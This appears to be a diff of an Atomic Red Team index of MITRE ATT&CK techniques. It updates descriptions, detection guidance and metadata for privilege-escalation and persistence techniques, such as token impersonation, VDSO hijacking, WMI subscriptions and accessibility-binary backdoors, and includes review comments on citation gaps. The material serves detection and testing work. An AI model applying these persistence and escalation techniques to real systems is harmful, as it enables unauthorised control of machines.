- Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
-
- The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Scott Lundgren, @5twenty9, Carbon Black
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1134.001:
technique:
+ created: '2020-02-18T16:39:06.289Z'
+ modified: '2020-03-26T21:29:18.608Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
+ description: |-
+ Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
+
+ An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
+ name: Token Impersonation/Theft
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1134.001
@@ -7210,23 +7327,6 @@ privilege-escalation:
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
source_name: Microsoft Command-line Logging
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Token Impersonation/Theft
- description: |-
- Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
-
- An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
- id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-26T21:29:18.608Z'
- created: '2020-02-18T16:39:06.289Z'
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -7275,22 +7375,22 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T16:43:02.273Z'
created: '2020-01-24T14:17:43.906Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: Trap commands must be registered for the shell or programs,
so they appear in files. Monitoring files for suspicious or overly broad trap
commands can narrow down suspicious behavior during an investigation. Monitor
for suspicious processes executed through trap interrupts.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1546.005
atomic_tests:
- name: Trap
@@ -7312,19 +7412,22 @@ privilege-escalation:
id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5
description: "Adversaries may inject malicious code into processes via VDSO
hijacking in order to evade process-based defenses as well as possibly elevate
- privileges. Virtual dynamic shared object (VDSO) hijacking is a method of
+ privileges. Virtual dynamic shared object (vdso) hijacking is a method of
executing arbitrary code in the address space of a separate live process.
\n\nVDSO hijacking involves redirecting calls to dynamically linked shared
- libraries mapped into all user-land processes by the kernel. An adversary
- may patch memory address references stored in a process' global offset table
- (which store absolute addresses of functions) to inject malicious code into
- a running process. This code can then be invoked by redirecting the execution
- flow of the process (ex: using custom shellcode or hijacked system calls).
- (Citation: ELF Injection May 2009) \n\nRunning code in the context of another
- process may allow access to the process's memory, system/network resources,
- and possibly elevated privileges. Execution via VDSO hijacking may also evade
- detection from security products since the execution is masked under a legitimate
- process. "
+ libraries. Memory protections may prevent writing executable code to a process
+ via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008).
+ However, an adversary may hijack the syscall interface code stubs mapped into
+ a process from the vdso shared object to execute syscalls to open and map
+ a malicious shared object. This code can then be invoked by redirecting the
+ execution flow of the process via patched memory address references stored
+ in a process' global offset table (which store absolute addresses of mapped
+ library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace
+ VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in
+ the context of another process may allow access to the process's memory, system/network
+ resources, and possibly elevated privileges. Execution via VDSO hijacking
+ may also evade detection from security products since the execution is masked
+ under a legitimate process. "
name: VDSO Hijacking
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -7337,6 +7440,18 @@ privilege-escalation:
url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html
description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via
GOT poisoning. Retrieved March 15, 2020.
+ - source_name: Backtrace VDSO
+ url: https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/
+ description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS.
+ Retrieved June 15, 2020.
+ - source_name: VDSO Aug 2005
+ url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/
+ description: Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved
+ June 16, 2020.
+ - source_name: Syscall 2014
+ url: https://lwn.net/Articles/604515/
+ description: Drysdale, D. (2014, July 16). Anatomy of a system call, part
+ 2. Retrieved June 16, 2020.
- description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
@@ -7345,7 +7460,7 @@ privilege-escalation:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -7359,16 +7474,11 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:58:10.186Z'
+ modified: '2020-06-20T22:28:45.232Z'
created: '2020-01-14T01:35:00.781Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - System calls
- - Process monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
and mmap, that can be used to attach to, manipulate memory, then redirect
a processes' execution path. Monitoring for Linux specific calls such as the
@@ -7379,9 +7489,13 @@ privilege-escalation:
\n\nAnalyze process behavior to determine if a process is performing actions
it usually does not, such as opening network connections, reading files, or
other suspicious actions that could relate to post-compromise behavior. "
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - System calls
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1078:
technique:
@@ -7419,31 +7533,13 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.955Z'
+ modified: '2020-06-20T22:44:36.043Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Process whitelisting
- - System access controls
- - Anti-virus
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_effective_permissions:
- - User
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
x_mitre_platforms:
- Linux
- macOS
@@ -7454,11 +7550,29 @@ privilege-escalation:
- SaaS
- Office 365
- Azure AD
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -7470,6 +7584,14 @@ privilege-escalation:
description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the
Front Lines. Retrieved May 18, 2016.'
source_name: Mandiant M-Trends 2015
+ - source_name: FireEye WMI SANS 2015
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
+ description: Devon Kerr. (2015). There's Something About WMI. Retrieved May
+ 4, 2020.
+ - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
+ description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
+ (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
+ source_name: FireEye WMI 2015
- url: https://www.secureworks.com/blog/wmi-persistence
description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016,
March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.
@@ -7496,7 +7618,7 @@ privilege-escalation:
description: |-
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
- Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
+ Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58
@@ -7506,23 +7628,23 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T14:58:13.113Z'
+ modified: '2020-05-05T12:02:45.522Z'
created: '2020-01-24T14:07:56.276Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - WMI Objects
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - WMI Objects
+ x_mitre_platforms:
+ - Windows
identifier: T1546.003
atomic_tests:
- name: Persistence via WMI Event Subscription
@@ -7617,20 +7739,10 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T22:22:10.041Z'
created: '2020-01-17T19:13:50.402Z'
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- - Travis Smith, Tripwire
- - Pedro Harrison
- x_mitre_data_sources:
- - API monitoring
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - Windows Registry
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: "Monitor processes and command-line arguments for actions
that could create or modify services. Command-line invocation of tools capable
of adding or modifying services may be unusual, depending on how systems are
@@ -7659,10 +7771,20 @@ privilege-escalation:
as part of a chain of behavior that could lead to other activities, such as
network connections made for Command and Control, learning details about the
environment through Discovery, and Lateral Movement."
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_data_sources:
+ - API monitoring
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ - Travis Smith, Tripwire
+ - Pedro Harrison
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
@@ -7748,26 +7870,16 @@ privilege-escalation:
catch {}
T1547.004:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1547.004
- url: https://attack.mitre.org/techniques/T1547/004
- - external_id: CAPEC-579
- source_name: capec
- url: https://capec.mitre.org/data/definitions/579.html
- - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
- description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
- Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
- source_name: Cylance Reg Persistence Sept 2013
- - url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
- Retrieved June 6, 2016.
- source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Winlogon Helper DLL
- description: "\nAdversaries may abuse features of Winlogon to execute DLLs and/or
+ created: '2020-01-24T16:59:59.688Z'
+ modified: '2020-04-21T16:00:41.277Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35
+ description: "Adversaries may abuse features of Winlogon to execute DLLs and/or
executables when a user logs in. Winlogon.exe is a Windows component responsible
for actions at logon/logoff as well as the secure attention sequence (SAS)
triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows
@@ -7783,15 +7895,25 @@ privilege-escalation:
user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell
executed when a user logs on\n\nAdversaries may take advantage of these features
to repeatedly execute malicious code and establish persistence."
- id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T16:17:22.487Z'
- created: '2020-01-24T16:59:59.688Z'
+ name: Winlogon Helper DLL
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.004
+ url: https://attack.mitre.org/techniques/T1547/004
+ - external_id: CAPEC-579
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/579.html
+ - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
+ description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
+ Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
+ source_name: Cylance Reg Persistence Sept 2013
+ - url: https://technet.microsoft.com/en-us/sysinternals/bb963902
+ description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
+ Retrieved June 6, 2016.
+ source_name: TechNet Autoruns
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -7911,24 +8033,24 @@ persistence:
phase_name: persistence
modified: '2020-03-24T16:28:04.990Z'
created: '2020-01-24T14:13:45.936Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process use of network
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: While users may customize their ~/.bashrc and
~/.bash_profile files , there are only certain types of commands
that typically appear in these files. Monitor for abnormal commands such as
execution of unknown programs, opening network sockets, or reaching out across
the network when user profiles are loaded during the login process.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process use of network
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
@@ -7977,8 +8099,8 @@ persistence:
source_name: capec
url: https://capec.mitre.org/data/definitions/558.html
- url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html
- description: 'Glyer, C., Kazanciyan, R. (2012, August 20). THE “HIKIT” ROOTKIT:
- ADVANCED AND PERSISTENT ATTACK TECHNIQUES (PART 1). Retrieved June 6, 2016.'
+ description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit:
+ Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.'
source_name: FireEye Hikit Rootkit
- url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom
description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to
@@ -7988,6 +8110,10 @@ persistence:
description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse.
Retrieved November 12, 2014.
source_name: Tilbury 2014
+ - source_name: Narrator Accessibility Abuse
+ url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
+ description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub'
+ URI for Fileless Persistence. Retrieved April 28, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -8001,7 +8127,7 @@ persistence:
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
- Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
+ Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: C:\Windows\System32\osk.exe
* Magnifier: C:\Windows\System32\Magnify.exe
@@ -8015,29 +8141,29 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T19:11:19.022Z'
+ modified: '2020-05-13T20:37:30.048Z'
created: '2020-01-24T14:32:40.315Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Paul Speulstra, AECOM Global Security Operations Center
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: Changes to accessibility utility binaries or binary paths
that do not correlate with known software, patch cycles, etc., are suspicious.
Command line invocation of tools capable of modifying the Registry for associated
keys are also suspicious. Utility arguments and the binaries themselves should
be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Paul Speulstra, AECOM Global Security Operations Center
+ x_mitre_platforms:
+ - Windows
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -8121,8 +8247,23 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-28T21:11:58.156Z'
+ modified: '2020-07-15T12:43:37.469Z'
created: '2017-05-31T21:31:12.196Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Praetorian
+ - Tim MalcomVetter
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ x_mitre_detection: |-
+ Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
+
+ Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
+
+ Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
x_mitre_platforms:
- Windows
- Office 365
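Review bot: The moved `x_mitre_detection` text for T1098 cites `(Citation: Microsoft Security Event 4670)` twice in a row while event 4728 has no citation of its own, so the second reference was presumably meant to point at a 4728 source; since this file looks regenerated from the ATT&CK STIX bundle, the fix belongs upstream, but the duplicated citation should be flagged rather than carried forward. The same block lists only `Authentication logs` and `Windows event logs` as data sources and only Windows event IDs in the guidance, although `x_mitre_platforms` for this entry also names Office 365, GCP, Azure AD and AWS. Sibling entries in this same file already use cloud-specific sources (`Office 365 audit logs`, `Azure activity logs`), so consumers filtering by platform will find no applicable data source here for the cloud cases. Consider adding a short caveat in the detection text that the event IDs apply to Windows/AD only and that cloud tenants need their respective audit logs.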
@@ -8130,21 +8271,8 @@ persistence:
- GCP
- Azure AD
- AWS
- x_mitre_detection: |-
- Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
-
- Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
-
- Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- - Praetorian
- - Tim MalcomVetter
- x_mitre_version: '2.1'
- x_mitre_is_subtechnique: false
+ - Linux
+ - macOS
identifier: T1098
atomic_tests:
- name: Admin Account Manipulate
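Review bot: Adding `- Linux` and `- macOS` to `x_mitre_platforms` for T1098 is not backed by any Linux/macOS data source or detection guidance in the entry, which still lists only `Windows event logs` and Windows security event IDs (visible in the preceding hunk). Anyone selecting atomics by platform will now get T1098 for Linux/macOS with nothing telling them what to monitor on those hosts. If this is a faithful regeneration of ATT&CK v7 content the gap is upstream, but it is worth a `# NOTE:` in the generator output or an issue upstream suggesting `File monitoring` / `Process monitoring` style sources for the Unix account files, consistent with how the Linux sub-techniques elsewhere in this file are annotated. Without that, the platform expansion widens scope without widening detectability.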
@@ -8207,20 +8335,20 @@ persistence:
phase_name: persistence
modified: '2020-03-24T12:40:02.331Z'
created: '2020-01-19T16:59:45.362Z'
- x_mitre_platforms:
- - Office 365
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_data_sources:
- - Office 365 audit logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Collect usage logs from cloud administrator accounts to
identify unusual activity in the assignment of roles to those accounts. Monitor
for accounts assigned to admin roles that go over a certain threshold of known
admins. '
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_platforms:
+ - Office 365
atomic_tests: []
T1137.006:
technique:
@@ -8264,23 +8392,23 @@ persistence:
phase_name: persistence
modified: '2020-03-26T17:34:02.877Z'
created: '2019-11-07T19:52:52.801Z'
- x_mitre_platforms:
- - Windows
- - Office 365
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: |-
+ Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
x_mitre_data_sources:
- Process command-line parameters
- File monitoring
- Windows Registry
- Process monitoring
- x_mitre_detection: |-
- Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1098.001:
technique:
@@ -8326,23 +8454,24 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-28T21:11:57.894Z'
+ modified: '2020-07-15T12:43:36.340Z'
created: '2020-01-19T16:10:15.008Z'
- x_mitre_platforms:
- - Azure AD
- - Azure
x_mitre_contributors:
+ - Oleg Kolesnikov, Securonix
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_data_sources:
- - Azure activity logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
